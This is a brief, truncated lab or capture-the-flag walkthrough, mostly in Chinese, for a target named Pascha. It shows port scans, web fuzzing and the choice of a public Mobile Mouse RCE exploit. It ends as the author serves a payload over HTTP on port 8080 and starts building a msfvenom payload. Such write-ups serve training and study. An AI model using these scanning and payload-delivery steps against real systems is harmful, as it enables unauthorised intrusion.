Challenge 6 - Pascha
Challenge 6 - Pascha └─$ rustscan -a 192.168.230.155 --scripts none --ulimit 5000 | tee rustscan 192.168.230.155 -> [80,9099,9999,35913] └─$ sudo nmap -sCV -p 80,9099,9999,35913 192.168.230.155 | tee nmap └─$ whatweb http://192.168.230.155 | tee whatweb 看來就是個一般的 IIS 網站 開啟來看看,預設 IIS 網頁看來沒搞頭 └─$ gobuster -w dirfuzzing.txt dir -u http://192.168.230.155 -t 150 -x txt,pdf,aspx,git | tee gibuster gobuster 結果一樣沒搞頭,暫時先放棄 80 Port 9099 Port 開啟來看看如下,看起來一樣沒搞頭 35913 掃描如下圖,雖然是 unknow 但寫了一段 Server : Mobile Mouse 且在描述中有提到會有 9099 Port,一切看來都符合現有靶機 Google 一下 [ 35913 Mobile Mouse ] 第一名就是 Exploit DB 又是 RCE,看來就是它了 網址 https://www.exploit-db.com/exploits/51010 下載後是個 python code 跑一下看看,看來會去網站 8080 Port 抓 command_shell 將 kali 的 HTTP Server 跑在 8080 Port 上,└─$ python3 -m http.server 8080 然後用 msfvenom 先做個 payload 吧,對方是個 Window...